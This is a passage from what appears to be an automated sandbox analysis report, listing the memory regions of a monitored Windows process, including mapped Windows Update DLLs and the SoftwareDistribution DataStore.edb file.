private name = "private_0x000007fffff88000" filename = "" Region: id = 2279 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 2280 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 2281 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 2282 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 2283 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 2284 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 2285 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 2286 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 2287 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 2288 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 2289 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 2290 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 2291 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 2292 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 2293 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 2294 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 2295 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 2296 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2297 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2298 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2299 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 2300 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2301 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2302 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 2303 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2304 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2305 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2901 start_va = 0x8f0000 end_va = 0x8f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 2902 start_va = 0x1710000 end_va = 0x178ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 2903 start_va = 0x2400000 end_va = 0x247ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 2904 start_va = 0xab0000 end_va = 0xb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 2905 start_va = 0x12a0000 end_va = 0x131ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 2906 start_va = 0x2b40000 end_va = 0x2bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 2907 start_va = 0x2c10000 end_va = 0x2c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c10000" filename = "" Region: id = 2908 start_va = 0x3310000 end_va = 0x338ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 2909 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 2910 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 2911 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 2912 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 2913 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2914 start_va = 0x3230000 end_va = 0x32affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 2915 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 2916 start_va = 0x3790000 end_va = 0x3b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 2917 start_va = 0x3480000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2918 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 2919 start_va = 0x7fef7970000 end_va = 0x7fef7986fff monitored = 0 entry_point = 0x7fef7979d50 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 2920 start_va = 0x1d60000 end_va = 0x1ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 2921 start_va = 0x33a0000 end_va = 0x341ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 2922 start_va = 0x3670000 end_va = 0x36effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003670000" filename = "" Region: id = 2923 start_va = 0x3bc0000 end_va = 0x3c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bc0000" filename = "" Region: id = 2924 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 2925 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 2926 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 3277 start_va = 0x23e0000 end_va = 0x245ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 3278 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3279 start_va = 0x2650000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 3280 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 3281 start_va = 0xab0000 end_va = 0xb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 3282 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 3283 start_va = 0x2b30000 end_va = 0x2baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 3284 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 3285 start_va = 0x12c0000 end_va = 0x133ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 3286 start_va = 0x27e0000 end_va = 0x285ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 3287 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 3288 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 3289 start_va = 0x3100000 end_va = 0x317ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 3290 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 3291 start_va = 0x31d0000 end_va = 0x324ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 3292 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 3293 start_va = 0x7fef3b70000 end_va = 0x7fef3dc2fff monitored = 0 entry_point = 0x7fef3b7236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 3294 start_va = 0x7fef76f0000 end_va = 0x7fef7969fff monitored = 0 entry_point = 0x7fef7722200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 3295 start_va = 0x7fef5c30000 end_va = 0x7fef5ca0fff monitored = 0 entry_point = 0x7fef5c6ecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 3296 start_va = 0x7fef9ea0000 end_va = 0x7fef9f10fff monitored = 0 entry_point = 0x7fef9ea1010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3297 start_va = 0x7fef9e30000 end_va = 0x7fef9e93fff monitored = 0 entry_point = 0x7fef9e31254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 3298 start_va = 0x7fef3dd0000 end_va = 0x7fef3deafff monitored = 0 entry_point = 0x7fef3dd1198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 3299 start_va = 0x7fef4570000 end_va = 0x7fef457efff monitored = 0 entry_point = 0x7fef4579a48 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 3300 start_va = 0x2bb0000 end_va = 0x2caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 3301 start_va = 0x772e0000 end_va = 0x772e6fff monitored = 0 entry_point = 0x772e106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 3302 start_va = 0x900000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 3303 start_va = 0x900000 end_va = 0x900fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3304 start_va = 0x930000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 3305 start_va = 0x910000 end_va = 0x916fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3306 start_va = 0x900000 end_va = 0x900fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3307 start_va = 0x910000 end_va = 0x916fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3308 start_va = 0x7fefcc30000 end_va = 0x7fefcc37fff monitored = 0 entry_point = 0x7fefcc32a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 3309 start_va = 0x7fef3b60000 end_va = 0x7fef3b6cfff monitored = 0 entry_point = 0x7fef3b61104 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 3310 start_va = 0x7fef3b60000 end_va = 0x7fef3b6efff monitored = 0 entry_point = 0x7fef3b66fb0 region_type = mapped_file name = "wups2.dll" filename = "\\Windows\\System32\\wups2.dll" (normalized: "c:\\windows\\system32\\wups2.dll") Region: id = 3311 start_va = 0x16c0000 end_va = 0x177ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3312 start_va = 0x900000 end_va = 0x919fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 3313 start_va = 0x3250000 end_va = 0x334ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003250000" filename = "" Region: id = 3314 start_va = 0x3c40000 end_va = 0x3d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c40000" filename = "" Region: id = 3315 start_va = 0x3d40000 end_va = 0x3e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 3316 start_va = 0x3e40000 end_va = 0x3f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 3317 start_va = 0x920000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 3318 start_va = 0x14b0000 end_va = 0x150ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 3319 start_va = 0x14b0000 end_va = 0x14bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014b0000" filename = "" Region: id = 3320 start_va = 0x14c0000 end_va = 0x14cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014c0000" filename = "" Region: id = 3321 start_va = 0x14d0000 end_va = 0x14dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014d0000" filename = "" Region: id = 3322 start_va = 0x14e0000 end_va = 0x14effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014e0000" filename = "" Region: id = 3323 start_va = 0x14f0000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014f0000" filename = "" Region: id = 3324 start_va = 0x1500000 end_va = 0x150ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001500000" filename = "" Region: id = 3325 start_va = 0x940000 end_va = 0x940fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 3326 start_va = 0x4050000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004050000" filename = "" Region: id = 3327 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 3328 start_va = 0x3f40000 end_va = 0x403ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f40000" filename = "" Region: id = 3329 start_va = 0x40d0000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3330 start_va = 0x1c30000 end_va = 0x1c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 3331 start_va = 0x1c30000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c30000" filename = "" Region: id = 3332 start_va = 0x1c40000 end_va = 0x1c4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c40000" filename = "" Region: id = 3333 start_va = 0x1c50000 end_va = 0x1c5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c50000" filename = "" Region: id = 3334 start_va = 0x1c60000 end_va = 0x1c6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c60000" filename = "" Region: id = 3335 start_va = 0x1c70000 end_va = 0x1c7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Region: id = 3336 start_va = 0x1c80000 end_va = 0x1c8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c80000" filename = "" Region: id = 3337 start_va = 0x950000 end_va = 0x957fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 3338 start_va = 0x41d0000 end_va = 0x51cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 3339 start_va = 0x960000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 3340 start_va = 0xa90000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 3341 start_va = 0xaa0000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 3342 start_va = 0xef0000 end_va = 0xef0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 3343 start_va = 0xf00000 end_va = 0xf01fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 3344 start_va = 0x20b0000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 3345 start_va = 0x20b0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020b0000" filename = "" Region: id = 3346 start_va = 0x20f0000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020f0000" filename = "" Region: id = 3347 start_va = 0xf10000 end_va = 0xf10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 3348 start_va = 0x20b0000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 3349 start_va = 0x20b0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020b0000" filename = "" Region: id = 3350 start_va = 0x20f0000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020f0000" filename = "" Region: id = 3351 start_va = 0x51d0000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051d0000" filename = "" Region: id = 3352 start_va = 0x51d0000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000051d0000" filename = "" Region: id = 3353 start_va = 0xf20000 end_va = 0xf20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 3354 start_va = 0x20b0000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 3355 start_va = 0x20b0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020b0000" filename = "" Region: id = 3356 start_va = 0x20f0000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020f0000" filename = "" Region: id = 3357 start_va = 0xf20000 end_va = 0xf20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 3358 start_va = 0xfb0000 end_va = 0xfb1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 3359 start_va = 0x20b0000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 3360 start_va = 0x20b0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020b0000" filename = "" Region: id = 3361 start_va = 0x20f0000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020f0000" filename = "" Region: id = 3362 start_va = 0x51d0000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051d0000" filename = "" Region: id = 3363 start_va = 0x51d0000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000051d0000" filename = "" Region: id = 3364 start_va = 0xfb0000 end_va = 0xfb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 3365 start_va = 0x20b0000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 3366 start_va = 0x20b0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020b0000" filename = "" Region: id = 3367 start_va = 0x20f0000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020f0000" filename = "" Region: id = 3368 start_va = 0xf20000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 3369 start_va = 0xfb0000 end_va = 0xfb7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 3370 start_va = 0xfc0000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 3371 start_va = 0xfd0000 end_va = 0xfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 3372 start_va = 0xfe0000 end_va = 0xfe7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 3373 start_va = 0xff0000 end_va = 0xff7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 3374 start_va = 0x1080000 end_va = 0x1087fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 3375 start_va = 0x1110000 end_va = 0x1111fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 3376 start_va = 0x3540000 end_va = 0x35bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 3377 start_va = 0x7fffff72000 end_va = 0x7fffff73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 3378 start_va = 0x1110000 end_va = 0x1117fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 3379 start_va = 0x1120000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 3380 start_va = 0x1120000 end_va = 0x1127fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 3381 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3382 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3383 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3384 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3385 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3386 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3387 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3388 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3389 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3390 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3391 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3392 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3393 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3394 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: 